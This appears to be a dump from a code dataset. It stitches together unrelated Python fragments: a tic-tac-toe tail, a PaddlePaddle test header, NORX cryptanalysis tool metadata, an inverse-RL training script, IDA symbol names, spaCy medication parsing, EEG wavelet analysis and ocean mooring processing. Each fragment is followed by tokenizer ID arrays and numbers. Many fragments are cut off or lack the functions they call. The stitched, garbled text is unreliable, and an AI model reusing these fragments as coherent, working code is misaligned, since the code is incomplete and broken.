              [grid[1][0], grid[1][1], grid[1][2]],
              [grid[2][0], grid[2][1], grid[2][2]],
              [grid[0][0], grid[1][0], grid[2][0]],
              [grid[0][1], grid[1][1], grid[2][1]],
              [grid[0][2], grid[1][2], grid[2][2]],
              [grid[0][0], grid[1][1], grid[2][2]],
              [grid[2][0], grid[1][1], grid[0][2]]]
# This part of the script actually lets the game run
# (print_board and make_move are defined elsewhere in the full source).
print_board()
make_move()
| [
628,
198,
198,
2,
973,
284,
1487,
18364,
319,
1938,
1210,
628,
198,
2,
21394,
510,
2315,
1287,
6565,
10706,
198,
25928,
796,
685,
198,
220,
220,
220,
14631,
33172,
366,
33172,
366,
366,
4357,
198,
220,
220,
220,
14631,
33172,
366,
3... | 1.982318 | 509 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import random
from op_test import OpTest
if __name__ == '__main__':
unittest.main()
| [
2,
220,
220,
15069,
357,
66,
8,
2864,
350,
37382,
47,
37382,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
... | 3.582569 | 218 |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
node.py
------
This file is part of NODE - the NORX Differential-Search Engine.
:copyright: (c) 2014 Philipp Jovanovic <philipp@jovanovic.io>
:license: BSD (3-Clause), see LICENSE
"""
__author__ = 'Philipp Jovanovic'
__email__ = 'philipp@jovanovic.io'
__version__ = 'v20141009'
__license__ = 'BSD (3-Clause)'
__description__='NODE: the (NO)RX (D)ifferential-Search (E)ngine'
import sys
import argparse
import src.utils as utils
import config.cmd as cmd
if __name__ == '__main__':
sys.exit(main())
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
21004,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
10139,
13,
9078,
198,
220,
220,
220,
40103,
628,
220,
220,
220,
770,
2393,
318,
636,
286,
... | 2.550661 | 227 |
import threading
import numpy as np
import ImageAnalyzer
import cv2
from PyQt5 import QtGui
import matplotlib.pyplot as plt
| [
11748,
4704,
278,
198,
11748,
299,
32152,
355,
45941,
198,
198,
11748,
7412,
37702,
9107,
198,
198,
11748,
269,
85,
17,
198,
6738,
9485,
48,
83,
20,
1330,
33734,
8205,
72,
198,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,... | 2.866667 | 45 |
__author__ = 'socialmoneydev'
from jsonBase import JsonBase
| [
834,
9800,
834,
796,
705,
14557,
26316,
7959,
6,
198,
6738,
33918,
14881,
1330,
449,
1559,
14881,
628
] | 3.388889 | 18 |
import tensorflow as tf
from sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy
from sandbox.rocky.tf.envs.base import TfEnv
from rllab.baselines.linear_feature_baseline import LinearFeatureBaseline
from rllab.envs.gym_env import GymEnv
from inverse_rl.algos.irl_trpo import IRLTRPO
from inverse_rl.models.imitation_learning import AIRLStateAction
from inverse_rl.models.airl_state import *
from inverse_rl.utils.log_utils import rllab_logdir, load_latest_experts
from inverse_rl.utils.hyper_sweep import run_sweep_parallel, run_sweep_serial
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--visible_gpus', type=str, default='0')
parser.add_argument('--fusion', action='store_false')
parser.add_argument('--debug', action='store_true')
parser.add_argument('--exp_folder', type=str)
parser.add_argument('--state_only', action="store_true")
parser.add_argument('--score_discrim', action="store_true")
args = parser.parse_args()
params_dict = {
'fusion': [args.fusion],
'visible_gpus': [args.visible_gpus],
'exp_folder': [args.exp_folder],
'debug' : [args.debug],
'state_only': [args.state_only],
'score_discrim': [args.score_discrim],
}
if args.debug == True:
main(fusion=args.fusion, debug=args.debug, visible_gpus=args.visible_gpus, \
exp_folder=args.exp_folder, state_only=args.state_only, \
score_discrim=args.score_discrim)
else:
run_sweep_parallel(main, params_dict, repeat=2) | [
11748,
11192,
273,
11125,
355,
48700,
198,
198,
6738,
35204,
13,
10823,
88,
13,
27110,
13,
79,
4160,
444,
13,
4908,
31562,
62,
4029,
79,
62,
30586,
1330,
12822,
31562,
5805,
10246,
21424,
198,
6738,
35204,
13,
10823,
88,
13,
27110,
13... | 2.523585 | 636 |
set_name(0x8014AFA0, "EA_cd_seek", SN_NOWARN)
set_name(0x8014AFA8, "MY_CdGetSector", SN_NOWARN)
set_name(0x8014AFDC, "init_cdstream", SN_NOWARN)
set_name(0x8014AFEC, "flush_cdstream", SN_NOWARN)
set_name(0x8014B010, "check_complete_frame", SN_NOWARN)
set_name(0x8014B090, "reset_cdstream", SN_NOWARN)
set_name(0x8014B0B8, "kill_stream_handlers", SN_NOWARN)
set_name(0x8014B118, "stream_cdready_handler", SN_NOWARN)
set_name(0x8014B30C, "CD_stream_handler", SN_NOWARN)
set_name(0x8014B3EC, "install_stream_handlers", SN_NOWARN)
set_name(0x8014B45C, "cdstream_service", SN_NOWARN)
set_name(0x8014B4F4, "cdstream_get_chunk", SN_NOWARN)
set_name(0x8014B618, "cdstream_is_last_chunk", SN_NOWARN)
set_name(0x8014B630, "cdstream_discard_chunk", SN_NOWARN)
set_name(0x8014B730, "close_cdstream", SN_NOWARN)
set_name(0x8014B7A8, "open_cdstream", SN_NOWARN)
set_name(0x8014B940, "set_mdec_img_buffer", SN_NOWARN)
set_name(0x8014B974, "start_mdec_decode", SN_NOWARN)
set_name(0x8014BAF8, "DCT_out_handler", SN_NOWARN)
set_name(0x8014BB94, "init_mdec", SN_NOWARN)
set_name(0x8014BC04, "init_mdec_buffer", SN_NOWARN)
set_name(0x8014BC20, "split_poly_area", SN_NOWARN)
set_name(0x8014C010, "rebuild_mdec_polys", SN_NOWARN)
set_name(0x8014C1E4, "clear_mdec_frame", SN_NOWARN)
set_name(0x8014C1F0, "draw_mdec_polys", SN_NOWARN)
set_name(0x8014C53C, "invalidate_mdec_frame", SN_NOWARN)
set_name(0x8014C550, "is_frame_decoded", SN_NOWARN)
set_name(0x8014C55C, "init_mdec_polys", SN_NOWARN)
set_name(0x8014C8EC, "set_mdec_poly_bright", SN_NOWARN)
set_name(0x8014C954, "init_mdec_stream", SN_NOWARN)
set_name(0x8014C9A4, "init_mdec_audio", SN_NOWARN)
set_name(0x8014CA5C, "kill_mdec_audio", SN_NOWARN)
set_name(0x8014CA8C, "stop_mdec_audio", SN_NOWARN)
set_name(0x8014CAB0, "play_mdec_audio", SN_NOWARN)
set_name(0x8014CD4C, "set_mdec_audio_volume", SN_NOWARN)
set_name(0x8014CE18, "resync_audio", SN_NOWARN)
set_name(0x8014CE48, "stop_mdec_stream", SN_NOWARN)
set_name(0x8014CE94, "dequeue_stream", SN_NOWARN)
set_name(0x8014CF80, "dequeue_animation", SN_NOWARN)
set_name(0x8014D130, "decode_mdec_stream", SN_NOWARN)
set_name(0x8014D31C, "play_mdec_stream", SN_NOWARN)
set_name(0x8014D3D0, "clear_mdec_queue", SN_NOWARN)
set_name(0x8014D3FC, "StrClearVRAM", SN_NOWARN)
set_name(0x8014D4BC, "PlayFMVOverLay", SN_NOWARN)
set_name(0x8014D8C4, "GetDown__C4CPad", SN_NOWARN)
set_name(0x8013A98C, "map_buf", SN_NOWARN)
set_name(0x8014998C, "imgbuf", SN_NOWARN)
set_name(0x801499E0, "br", SN_NOWARN)
set_name(0x8014A020, "tmdc_pol", SN_NOWARN)
set_name(0x8014A660, "mdc_buf", SN_NOWARN)
set_name(0x8014A670, "tmdc_pol_offs", SN_NOWARN)
set_name(0x8014ACB0, "mdc_idx", SN_NOWARN)
set_name(0x8014ACD8, "mdec_queue", SN_NOWARN)
set_name(0x8014AE18, "mdec_drenv", SN_NOWARN)
set_name(0x8014AE98, "stream_buf", SN_NOWARN)
set_name(0x8014AF1C, "stream_bufh", SN_NOWARN)
| [
2617,
62,
3672,
7,
15,
87,
23,
28645,
32,
7708,
15,
11,
366,
16412,
62,
10210,
62,
36163,
1600,
11346,
62,
45669,
1503,
45,
8,
198,
2617,
62,
3672,
7,
15,
87,
23,
28645,
32,
7708,
23,
11,
366,
26708,
62,
34,
67,
3855,
50,
9250... | 1.93456 | 1,467 |
# Copyright 2018,2020 Ivan Yelizariev <https://it-projects.info/team/yelizariev>
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
from odoo import models
from odoo.http import request
| [
2,
15069,
2864,
11,
42334,
21798,
28876,
528,
283,
11203,
1279,
5450,
1378,
270,
12,
42068,
13,
10951,
14,
15097,
14,
88,
417,
528,
283,
11203,
29,
198,
2,
13789,
17370,
6489,
12,
18,
13,
15,
393,
1568,
357,
4023,
1378,
2503,
13,
... | 2.898551 | 69 |
import argparse
# model_name_or_path 'openai-gpt2' did not work, just gpt2 now
| [
11748,
1822,
29572,
198,
2,
2746,
62,
3672,
62,
273,
62,
6978,
705,
9654,
1872,
12,
70,
457,
17,
6,
750,
407,
670,
11,
655,
308,
457,
17,
783,
628,
198
] | 2.612903 | 31 |
from rapidsms.router.blocking import BlockingRouter
from celery_router.tasks import rapidsms_handle_message
class CeleryRouter(BlockingRouter):
"""Skeleton router only used to execute the Celery task."""
| [
6738,
4095,
2340,
907,
13,
472,
353,
13,
41938,
1330,
1086,
8629,
49,
39605,
198,
198,
6738,
18725,
1924,
62,
472,
353,
13,
83,
6791,
1330,
4095,
2340,
907,
62,
28144,
62,
20500,
628,
198,
4871,
15248,
1924,
49,
39605,
7,
3629,
8629... | 3.246154 | 65 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import rospy
import sys
from std_msgs.msg import String
rospy.init_node('boke') # ノード名「count」に設定
pub = rospy.Publisher('funny_boke', String, queue_size=10) # パブリッシャ「count_up」を作成
rate = rospy.Rate(10) # 10Hzで実行
input_line = ""
print("うちのおかんがな、好きな朝ごはんあるらしいねん")
print("でも名前忘れたらしくてね")
while "ありがとうございました" not in input_line:
print("ボケてください↓")
input_line = sys.stdin.readline()
pub.publish(input_line)
rate.sleep()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
686,
2777,
88,
198,
11748,
25064,
198,
6738,
14367,
62,
907,
14542,
13,
19662,
1330,
10903,
198,
198,
... | 1.626866 | 335 |
#!/bin/false
# Copyright (c) 2022 Vít Labuda. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import final, Final, Any, Sequence, Type, Dict, Hashable, Union, Optional, Tuple
from datalidator.blueprints.BlueprintIface import BlueprintIface
from datalidator.blueprints.DefaultBlueprintWithStandardFeaturesImplBase import DefaultBlueprintWithStandardFeaturesImplBase
from datalidator.blueprints.extras.ObjectModel import ObjectModel
from datalidator.blueprints.extras.OptionalItemIface import OptionalItemIface
from datalidator.blueprints.impl.PredefinedDictionaryBlueprint import PredefinedDictionaryBlueprint
from datalidator.blueprints.exc.err.InvalidBlueprintConfigError import InvalidBlueprintConfigError
from datalidator.filters.FilterIface import FilterIface
from datalidator.validators.ValidatorIface import ValidatorIface
__all__ = "ObjectBlueprint",
class ObjectBlueprint(DefaultBlueprintWithStandardFeaturesImplBase[ObjectModel]):
"""
INPUT:
- any object convertible to 'dict' whose items conform to the initializer-provided 'object_model'
OUTPUT:
- an instance of the initializer-provided subclass of 'ObjectModel'
NOTE: See this library's examples for usage information.
"""
__slots__ = "__object_model", "__ignore_input_keys_which_are_not_in_model", "__predefined_dictionary_blueprint"
@final
@final
@final
| [
2,
48443,
8800,
14,
9562,
198,
198,
2,
15069,
357,
66,
8,
33160,
569,
8836,
83,
3498,
15339,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
17613,
11,
389,
... | 3.587342 | 790 |
"""
IGWeight.py -
Compute IG Weights given a set of tokenized buckets and a feature set
Marco Lui, January 2013
Based on research by Marco Lui and Tim Baldwin.
Copyright 2013 Marco Lui <saffsd@gmail.com>. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are
permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list
of conditions and the following disclaimer in the documentation and/or other materials
provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the
authors and should not be interpreted as representing official policies, either expressed
or implied, of the copyright holder.
"""
import argparse
import csv
import os
from collections import defaultdict
import numpy
from .common import unmarshal_iter, MapPool, Enumerator, write_weights, read_features
def entropy(v, axis=0):
"""
Optimized implementation of entropy. This version is faster than that in
scipy.stats.distributions, particularly over long vectors.
"""
v = numpy.array(v, dtype='float')
s = numpy.sum(v, axis=axis)
with numpy.errstate(divide='ignore', invalid='ignore'):
rhs = numpy.nansum(v * numpy.log(v), axis=axis) / s
r = numpy.log(s) - rhs
# Where dealing with binarized events, it is possible that an event always
# occurs and thus has 0 information. In this case, the negative class
# will have frequency 0, resulting in log(0) being computed as nan.
# We replace these nans with 0
nan_index = numpy.isnan(rhs)
if nan_index.any():
r[nan_index] = 0
return r
def setup_pass_IG(features, dist, binarize, suffix):
"""
@param features the list of features to compute IG for
@param dist the background distribution
@param binarize (boolean) compute IG binarized per-class if True
@param suffix of files in bucketdir to process
"""
global __features, __dist, __binarize, __suffix
__features = features
__dist = dist
__binarize = binarize
__suffix = suffix
def pass_IG(bucket):
"""
In this pass we compute the information gain for each feature, binarized
with respect to each language as well as unified over the set of all
classes.
@global __features the list of features to compute IG for
@global __dist the background distribution
@global __binarize (boolean) compute IG binarized per-class if True
@global __suffix of files in bucketdir to process
@param bucket the bucket file to process. It is assumed to contain marshalled (term, event_id, count) triplets.
"""
global __features, __dist, __binarize, __suffix
# We first tally the per-event frequency of each
# term in our selected feature set.
term_freq = defaultdict(lambda: defaultdict(int))
term_index = defaultdict(Enumerator())
for path in os.listdir(bucket):
if path.endswith(__suffix):
for key, event_id, count in unmarshal_iter(os.path.join(bucket,path)):
# Select only our listed features
if key in __features:
term_index[key]
term_freq[key][event_id] += count
num_term = len(term_index)
num_event = len(__dist)
cm_pos = numpy.zeros((num_term, num_event), dtype='int')
for term,term_id in term_index.iteritems():
# update event matrix
freq = term_freq[term]
for event_id, count in freq.iteritems():
cm_pos[term_id, event_id] = count
cm_neg = __dist - cm_pos
cm = numpy.dstack((cm_neg, cm_pos))
if not __binarize:
# non-binarized event space
x = cm.sum(axis=1)
term_w = x / x.sum(axis=1)[:, None].astype(float)
# Entropy of the term-present/term-absent events
e = entropy(cm, axis=1)
# Information Gain with respect to the set of events
ig = entropy(__dist) - (term_w * e).sum(axis=1)
else:
# binarized event space
# Compute IG binarized with respect to each event
ig = list()
for event_id in range(num_event):
num_doc = __dist.sum()
prior = numpy.array((num_doc - __dist[event_id], __dist[event_id]), dtype=float) / num_doc
cm_bin = numpy.zeros((num_term, 2, 2), dtype=int) # (term, p(term), p(lang|term))
cm_bin[:,0,:] = cm.sum(axis=1) - cm[:,event_id,:]
cm_bin[:,1,:] = cm[:,event_id,:]
e = entropy(cm_bin, axis=1)
x = cm_bin.sum(axis=1)
term_w = x / x.sum(axis=1)[:, None].astype(float)
ig.append( entropy(prior) - (term_w * e).sum(axis=1) )
ig = numpy.vstack(ig)
terms = sorted(term_index, key=term_index.get)
return terms, ig
def read_dist(path):
"""
Read the distribution from a file containing item, count pairs.
@param path path to read form
"""
with open(path) as f:
reader = csv.reader(f)
return numpy.array(zip(*reader)[1], dtype=int)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-j","--jobs", type=int, metavar='N', help="spawn N processes (set to 1 for no paralleization)")
parser.add_argument("-f","--features", metavar='FEATURE_FILE', help="read features from FEATURE_FILE")
parser.add_argument("-w","--weights", metavar='WEIGHTS', help="output weights to WEIGHTS")
parser.add_argument("model", metavar='MODEL_DIR', help="read index and produce output in MODEL_DIR")
parser.add_argument("-d","--domain", action="store_true", default=False, help="compute IG with respect to domain")
parser.add_argument("-b","--binarize", action="store_true", default=False, help="binarize the event space in the IG computation")
parser.add_argument("-l","--lang", action="store_true", default=False, help="compute IG with respect to language")
args = parser.parse_args()
if not(args.domain or args.lang) or (args.domain and args.lang):
parser.error("exactly one of domain(-d) or language (-l) must be specified")
if args.features:
feature_path = args.features
else:
feature_path = os.path.join(args.model, 'DFfeats')
bucketlist_path = os.path.join(args.model, 'bucketlist')
if not os.path.exists(feature_path):
parser.error('{0} does not exist'.format(feature_path))
bucketlist = map(str.strip, open(bucketlist_path))
features = read_features(feature_path)
if args.domain:
index_path = os.path.join(args.model,'domain_index')
suffix = '.domain'
elif args.lang:
index_path = os.path.join(args.model,'lang_index')
suffix = '.lang'
else:
raise ValueError("no event specified")
if args.weights:
weights_path = args.weights
else:
weights_path = os.path.join(args.model, 'IGweights' + suffix + ('.bin' if args.binarize else ''))
# display paths
print("model path:", args.model )
print("buckets path:", bucketlist_path)
print("features path:", feature_path)
print("weights path:", weights_path)
print("index path:", index_path)
print("suffix:", suffix)
print("computing information gain")
dist = read_dist(index_path)
ig = compute_IG(bucketlist, features, dist, args.binarize, suffix, args.jobs)
write_weights(ig, weights_path)
| [
37811,
198,
3528,
25844,
13,
9078,
532,
198,
7293,
1133,
35336,
775,
2337,
1813,
257,
900,
286,
11241,
1143,
38674,
290,
257,
3895,
900,
198,
198,
37179,
6026,
72,
11,
3269,
2211,
198,
198,
15001,
319,
2267,
416,
16556,
6026,
72,
290,... | 2.710065 | 3,080 |
import pandas as pd
from collections import defaultdict
from collections import OrderedDict
import matplotlib.pyplot as plt
import random
import re
import ast
from nltk.corpus import wordnet as wn
import spacy
from spacy import displacy
from collections import Counter
import en_core_web_sm
nlp = spacy.load("en")
print(nlp)
df_medications=pd.read_excel("sample_medication.xlsx")
medication_list=df_medications["text"].tolist()
medication_list_med=df_medications["medication"].tolist()
dosage_list=[]
timing_list=[]
purpose_list=[]
for i in range(len(medication_list)):
u=medication_list[i].strip()
doc = nlp(u)
dosages=[]
timings=[]
medications=[]
purposes=[]
dosage_indicators=["every", "each", "per", "once", "twice", "thrice", "times"]
for ent in doc.ents:
#print(ent.text, ent.label_)
if ent.label_ == 'DATE':
tex=ent.text.lower()
if any(sub in tex for sub in dosage_indicators): dosages.append(tex)
else: timings.append(tex)
for chunk in doc.noun_chunks:
#print("text: " + chunk.text)
#print("label: " + chunk.label_)
#print("root: " + chunk.root.text)
if chunk.root.text == 'DATE':
tex=chunk.text.lower()
if any(sub in tex for sub in dosage_indicators): dosages.append(tex)
else: timings.append(tex)
else:
word_a=chunk.root.text
for token in doc:
word_b=token.text.lower()
if word_a!=word_b:
continue
lem=token.lemma_.lower()
#print(lem, token.pos_)
if token.pos_=="NOUN" and token.tag_=="NN":
s_lower= chunk.text.strip().lower()
if 'purpose' not in s_lower and 'medication' not in s_lower and 'dosage' not in s_lower and 'timing' not in s_lower:medications.append(chunk.text)
s_lower= chunk.text.strip().lower()
if 'purpose' not in s_lower and 'medication' not in s_lower and 'dosage' not in s_lower and 'timing' not in s_lower:purposes.append(chunk.text)
parts=u.split()
possible=["every", "once", "twice", "thrice"]
for index, part in enumerate(parts):
if (part=="times" or part=="time") and index>0:
new_dosage=parts[index-1]+" "+parts[index]
possible.append(new_dosage)
u=u.lower()
possible_prefix="|".join(possible)
possible_prefix="("+possible_prefix+")"
m = re.findall(possible_prefix+'(.*?)(\\.|day|week|month|year)', u)
if m!=None:
for m_elem in m:
t=m_elem[0]+m_elem[1]+m_elem[2]
dosages.append(t)
dosages=list(set(dosages))
'''
m = re.findall('(take|taking|took|taken|takes|taken)(.*?)(\\.|for|since)', u)
if m!=None:
for m_elem in m:
t=m_elem[1]
medications.append(t)
'''
medications=list(set(medications))
m = re.findall('(take|taking|took|taken|takes|taken|use|using|used|uses)(.+?)(for)(.+?)(\\.)', u)
if m!=None:
for m_elem in m:
#print(m_elem)
t=m_elem[3]
s=m_elem[1]
t_parts=t.split()
s_parts=s.split()
if len(t_parts)<=2:
purposes.append(t.strip().lower())
if len(s_parts)<=2:
medications.append(s.strip().lower())
purposes=list(set(purposes))
medications=list(set(medications))
m = re.findall('(medication |medication:|medications |medications:)(.+?)(,|\\.|and)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower= s.strip().lower()
medications.append(s_lower)
medications=list(set(medications))
m = re.findall('(purpose |problem |purpose:|purposes |purposes:)(.+?)(,|\\.|and)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower= s.strip().lower()
purposes.append(s_lower)
purposes=list(set(purposes))
m = re.findall('(timing |timing:|timings |timings:)(.+?)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower=s.strip().lower()
if s_lower!="":
timings.append(s_lower)
timings=list(set(timings))
m = re.findall('(dosage |dosage:|dosages |dosages:)(.+?)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower=s.strip().lower()
if s_lower!="":
dosages.append(s_lower)
dosages=list(set(dosages))
print("response: ")
print(doc)
print("medications: ")
print(medications)
print("purpose: ")
print(purposes)
print("timing: ")
print(timings)
print("dosages: ")
print(dosages)
#df_medications=pd.read_excel("sample_medication.xlsx")
#medication_list=df_medications["text"].tolist()
#medication_list_med=df_medications["medication"].tolist()
dosage_list.append(dosages)
timing_list.append(timings)
purpose_list.append(purposes)
dic_res={
"text":medication_list,
"medications": medication_list_med,
"purposes": purpose_list,
"dosages": dosage_list,
"timings": timing_list
}
df_res=pd.DataFrame(dic_res)
df_res.to_csv('parsed_medication.csv')
| [
11748,
19798,
292,
355,
279,
67,
198,
6738,
17268,
1330,
4277,
11600,
198,
6738,
17268,
1330,
14230,
1068,
35,
713,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
4738,
198,
11748,
302,
198,
11748,
6468,
198,
... | 1.944815 | 2,845 |
@Setup
@Token("T_STRING")
@Token("T_PRODUCER")
@Token("T_SPLIT")
@Pattern(["T_STRING", "T_PRODUCER", "T_STRING"])
@Pattern(["S_SUB"])
@Pattern(["S_SUB", "S_DEF"])
| [
31,
40786,
198,
198,
31,
30642,
7203,
51,
62,
18601,
2751,
4943,
198,
198,
31,
30642,
7203,
51,
62,
4805,
3727,
9598,
1137,
4943,
198,
198,
31,
30642,
7203,
51,
62,
4303,
43,
2043,
4943,
198,
198,
31,
47546,
7,
14692,
51,
62,
1860... | 1.857143 | 91 |
"""
Draw the maximum co-efficient value matrix
TODO: [Done]find the max RMD value, and get coefficient matrix for this value
"""
import numpy as np
import os
from scipy import signal
from scipy import stats
import matplotlib.pyplot as plt
# Global arrays
wav_out = []
def co_matrix(data):
"""
I will made the diagonal zeros for calculation
"""
count = 0
#cm = np.identity(34)
cm = np.zeros((31,31))
for i in range(31-1):
for j in range(i+1, 31):
cm[i, j] = data[count]
cm[j, i] = data[count]
count+=1
#print(count)
return cm
def wave_let(filter_data, raw_data):
"""
parameters:
filter_data: One channel of the filtered data
raw_data: One channel of the raw data
return:
the value of the whole channel
"""
total = 0
for i in range(raw_data.shape[0]):
total += raw_data[i] * morlet(filter_data[i])
#print(f)
return np.sqrt(filter_data.astype(np.complex)) * total
if __name__ == "__main__":
"""
# Read data
raw_data = np.load("raw_signal.npy", allow_pickle=True)
filtered_data = np.load("beta_signal.npy", allow_pickle=True)
#y = wave_let(filtered_data[0,1], raw_data[0,1])
#x = morlet(filtered_data[0,1][0,0])
#print(y)
for person in range(5):
for intensity in range(10):
raw = raw_data[person, intensity]
fil = filtered_data[person, intensity]
wav_data = np.empty_like(raw, dtype=np.complex)
for col in range(raw.shape[1]):
wav_data[:,col] = wave_let(fil[:,col], raw[:,col])
wav_out.append(wav_data)
all_waves = np.array(wav_out)
np.save("wavlet_beta_data", all_waves)
"""
wavelet_data = np.load("wavlet_beta_data.npy", allow_pickle=True)
#print(wavelet_data[0].shape)
# calculate the rmd value
rec_value = []
for intense in wavelet_data:
rec_value.append(RMD(intense))
np.save("RMD_beta_value", rec_value)
rmd_data = np.load("RMD_beta_value.npy", allow_pickle=True)
#print(rmd_data.shape)
#print(all_rmd[0].shape)
"""
max_index = np.argmax(rmd_data)
#print(max_index)
#print(rmd_data[max_index])
# find max for each person
rmd_data = np.load("RMD_value.npy", allow_pickle=True)
all_rmd = np.load("all_RMD_value.npy", allow_pickle=True)
for i in range(0, 50, 10):
max_index = np.argmax(rmd_data[i:i+10])
print("H", max_index, max_index+i)
person = co_matrix(all_rmd[max_index+i])
place = np.argmax(person)//31, np.argmax(person)%31
print(place)
"""
# plot
inten = np.linspace(0.1,1, 10)
for i in range(0,50,10):
person = "person", str(i/10+1)
plt.plot(inten, rmd_data[i:i+10], label=person)
plt.xlabel("intensity")
plt.ylabel("RMD")
plt.title("RMD for each_person")
plt.show()
| [
37811,
198,
25302,
262,
5415,
763,
12,
16814,
1988,
17593,
220,
198,
198,
51,
3727,
46,
25,
685,
45677,
60,
19796,
262,
3509,
371,
12740,
1988,
11,
290,
651,
35381,
17593,
329,
428,
1988,
198,
37811,
198,
198,
11748,
299,
32152,
355,
... | 2.137427 | 1,368 |
#print (text to write on the terminal)
print("ello world") | [
2,
4798,
357,
5239,
284,
3551,
319,
262,
12094,
8,
198,
4798,
7203,
11109,
995,
4943
] | 3.625 | 16 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# %% [markdown]
# # Process the raw mooring data
#
# Contents:
# * <a href=#raw>Raw data reprocessing.</a>
# * <a href=#corrected>Interpolated data processing.</a>
# * <a href=#ADCP>ADCP processing.</a>
# * <a href=#VMP>VMP processing.</a>
#
# Import the needed libraries.
# %%
import datetime
import glob
import os
import gsw
import numpy as np
import numpy.ma as ma
import scipy.integrate as igr
import scipy.interpolate as itpl
import scipy.io as io
import scipy.signal as sig
import seawater
import xarray as xr
from matplotlib import path
import munch
import load_data
import moorings as moo
import utils
from oceans.sw_extras import gamma_GP_from_SP_pt
# Data directory
data_in = os.path.expanduser("../data")
data_out = data_in
# %% [markdown]
# <a id="raw"></a>
# %% [markdown]
# ## Process raw data into a more convenient format
#
# Parameters for raw processing.
# %%
# Corrected levels.
# heights = [-540., -1250., -2100., -3500.]
# Filter cut off (hours)
tc_hrs = 40.0
# Start of time series (matlab datetime)
t_start = 734494.0
# Length of time series
max_len = N_data = 42048
# Data file
raw_data_file = "moorings.mat"
# Index where NaNs start in u and v data from SW mooring
sw_vel_nans = 14027
# Sampling period (minutes)
dt_min = 15.0
# Window length for wave stress quantities and mesoscale strain quantities.
nperseg = 2 ** 9
# Spectra parameters
window = "hanning"
detrend = "constant"
# Extrapolation/interpolation limit above which data will be removed.
dzlim = 100.0
# Integration of spectra parameters. These multiple N and f respectively to set
